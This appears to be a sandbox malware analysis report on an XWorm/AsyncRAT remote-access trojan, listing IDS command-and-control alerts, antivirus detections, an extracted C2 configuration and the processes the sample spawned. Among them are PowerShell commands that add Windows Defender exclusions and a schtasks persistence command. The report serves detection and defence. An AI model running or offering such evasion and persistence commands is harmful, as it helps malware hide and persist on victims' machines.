2024-11-29T15:20:18.786270+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.906505+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.966388+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.086730+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.206697+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.327415+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.447502+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.567736+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.785059+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.905186+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.025248+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.145348+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.265461+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.381652+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.501705+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.622209+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.696654+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP

Suricata alerts, SID 2855924:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:20:35.886539+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49806 | 103.230.121.124 | 7000 | TCP

Suricata alerts, SID 2853191:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:20:15.306150+0100 | 2853191 | 1 | Malware Command and Control Activity Detected | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP

Suricata alerts, SID 2853192:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:20:14.029990+0100 | 2853192 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49806 | 103.230.121.124 | 7000 | TCP

AV Detection

Source: file.exe, Avira: detected
Source: C:\Users\user\AppData\Roaming\Word.exe, Avira: detection malicious, Label: TR/Spy.Gen
Source: file.exe, Malware Configuration Extractor: Xworm {"C2 url": ["103.230.121.124"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: C:\Users\user\AppData\Roaming\Word.exe, ReversingLabs: Detection: 76%
Source: file.exe, ReversingLabs: Detection: 76%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Word.exe, Joe Sandbox ML: detected
Source: file.exe, Joe Sandbox ML: detected
Source: file.exe, String decryptor: 103.230.121.124
Source: file.exe, String decryptor: 7000
Source: file.exe, String decryptor: <123456789>
Source: file.exe, String decryptor: <Xwormmm>
Source: file.exe, String decryptor: MicrosoftWord
Source: file.exe, String decryptor: USB.exe
Source: file.exe, String decryptor: %AppData%
Source: file.exe, String decryptor: Word.exe
Source: file.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exe, Code function: 4x nop then jmp 00007FFAAC494667h, 0_2_00007FFAAC493E45
Source: C:\Users\user\Desktop\file.exe, Code function: 4x nop then jmp 00007FFAAC492CF2h, 0_2_00007FFAAC492B2D

                    Networking

                    Source: Network traffic | Suricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.7:49806 -> 103.230.121.124:7000
                    Source: Network traffic | Suricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 103.230.121.124:7000 -> 192.168.2.7:49806
                    Source: Network traffic | Suricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.7:49829 -> 103.230.121.124:7000
                    Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49829 -> 103.230.121.124:7000
                    Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 103.230.121.124:7000 -> 192.168.2.7:49806
                    Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49806 -> 103.230.121.124:7000
                    Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 103.230.121.124:7000 -> 192.168.2.7:49806
                    Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49806 -> 103.230.121.124:7000
                    Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 103.230.121.124:7000 -> 192.168.2.7:49829
                    Source: Malware configuration extractor | URLs: 103.230.121.124
                    Source: Yara match | File source: file.exe, type: SAMPLE
                    Source: Yara match | File source: 0.0.file.exe.260000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\Word.exe, type: DROPPED
                    Source: global traffic | TCP traffic: 192.168.2.7:49806 -> 103.230.121.124:7000
                    Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: Joe Sandbox View | IP Address: 208.95.112.1
                    Source: Joe Sandbox View | ASN Name: VPSQUANUS
                    Source: unknown | DNS query: name: ip-api.com
                    Source: unknown | TCP traffic detected without corresponding DNS query: 103.230.121.124 (this entry appears 50 times in the report)
                    Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                    Source: powershell.exe, 0000000B.00000002.1451558022.000001D169939000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1827907029.0000024E3F432000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
                    Source: powershell.exe, 00000010.00000002.1824109278.0000024E3F346000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
                    Source: powershell.exe, 00000010.00000002.1824109278.0000024E3F346000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
                    Source: file.exe, Word.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: powershell.exe, 00000007.00000002.1321120516.0000022D4B1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1438468730.000001D1614B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1588201996.000001661006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000007.00000002.1335289999.0000022D539F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://osoft.co
                    Source: powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000007.00000002.1304950670.0000022D3B3A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1373555805.000001D1517F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1478158258.0000016600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: file.exe, 00000000.00000002.2523388920.0000000002681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1304950670.0000022D3B181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1373555805.000001D151441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1478158258.0000016600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1652250573.0000024E26C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000007.00000002.1304950670.0000022D3B3A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1373555805.000001D1517F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1478158258.0000016600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 0000000B.00000002.1451558022.000001D169961000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.c
                    Source: powershell.exe, 0000000E.00000002.1615577139.0000016677A06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co~
                    Source: powershell.exe, 00000007.00000002.1304950670.0000022D3B181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1373555805.000001D151441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1478158258.0000016600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1652250573.0000024E26C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000007.00000002.1321120516.0000022D4B1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1438468730.000001D1614B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1588201996.000001661006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 0.2.file.exe.a60000.0.raw.unpack, RemoteDesktop.cs | .Net Code: GetScreen

                    Operating System Destruction

                    Source: C:\Users\user\Desktop\file.exe | Process information set: 01 00 00 00

                    System Summary

                    Source: file.exe, type: SAMPLE | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.0.file.exe.260000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000002.2555959588.0000000012691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000000.1250043956.0000000000262000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\Word.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFAAC4860C6
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFAAC49128A
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFAAC493E45
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFAAC487272
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFAAC481719
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFAAC489B09
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFAAC4812F8
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFAAC4820F5
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFAAC48C5E8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FFAAC5430E7
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFAAC5430E9
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Code function: 20_2_00007FFAAC481719
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Code function: 20_2_00007FFAAC4812F8
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Code function: 20_2_00007FFAAC481038
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Code function: 20_2_00007FFAAC4820F5
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Code function: 23_2_00007FFAAC471719
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Code function: 23_2_00007FFAAC4712F8
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Code function: 23_2_00007FFAAC471038
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Code function: 23_2_00007FFAAC4720F5
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Code function: 24_2_00007FFAAC471719
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Code function: 24_2_00007FFAAC4712F8
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Code function: 24_2_00007FFAAC471038
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Code function: 24_2_00007FFAAC4720F5
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Code function: 25_2_00007FFAAC471719
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Code function: 25_2_00007FFAAC4712F8
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Code function: 25_2_00007FFAAC471038
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Code function: 25_2_00007FFAAC4720F5
                    Source: file.exe, 00000000.00000002.2555959588.00000000126F9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXClient.exe4 vs file.exe
                    Source: file.exe, 00000000.00000000.1250043956.00000000002C9000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameXClient.exe4 vs file.exe
                    Source: file.exe, 00000000.00000002.2522399735.0000000000A60000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRemoteDesktop.dll< vs file.exe
                    Source: file.exe | Binary or memory string: OriginalFilenameXClient.exe4 vs file.exe
                    Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.0.file.exe.260000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000002.2555959588.0000000012691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000000.1250043956.0000000000262000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Roaming\Word.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: file.exe, RLNc59m3K5qBU9nVpBi0AKzQWHnZ4GB7uwf5x7A0VpPRtOmln5U0LHjGRFKVDduY3yBpI1XMO.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: file.exe, mYAr1k08yb0HzmCgp0BEzPHAJWWzMQXamHNPm3NQBAqCoG6fW6xB8GV5ryb6UTU5pbINLp5FL.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: Word.exe.0.dr, RLNc59m3K5qBU9nVpBi0AKzQWHnZ4GB7uwf5x7A0VpPRtOmln5U0LHjGRFKVDduY3yBpI1XMO.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: Word.exe.0.dr, mYAr1k08yb0HzmCgp0BEzPHAJWWzMQXamHNPm3NQBAqCoG6fW6xB8GV5ryb6UTU5pbINLp5FL.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.file.exe.a60000.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: Word.exe.0.dr, ub99fRJjxxhOnbd1IRYK3hmGl4xhrDhQcSfdxKqEc9S0YSzeggxQAVz5.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: Word.exe.0.dr, ub99fRJjxxhOnbd1IRYK3hmGl4xhrDhQcSfdxKqEc9S0YSzeggxQAVz5.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: file.exe, ub99fRJjxxhOnbd1IRYK3hmGl4xhrDhQcSfdxKqEc9S0YSzeggxQAVz5.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: file.exe, ub99fRJjxxhOnbd1IRYK3hmGl4xhrDhQcSfdxKqEc9S0YSzeggxQAVz5.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@20/21@1/2
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Word.exe
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exe | Mutant created: \Sessions\1\BaseNamedObjects\Lt4TYUUi1TXxaPwR
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6312:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
                    Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: file.exe | ReversingLabs: Detection: 76%
                    Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Word.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Word.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe"
                    Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\Word.exe C:\Users\user\AppData\Roaming\Word.exe
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\Word.exe "C:\Users\user\AppData\Roaming\Word.exe"
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: rasman.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: sxs.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: scrrun.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (four powershell.exe instances were recorded; all four loaded the same 35 modules, listed once below in first-instance order; the per-instance repeats and a doubled ucrtbase_clr0400.dll entry are collapsed)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
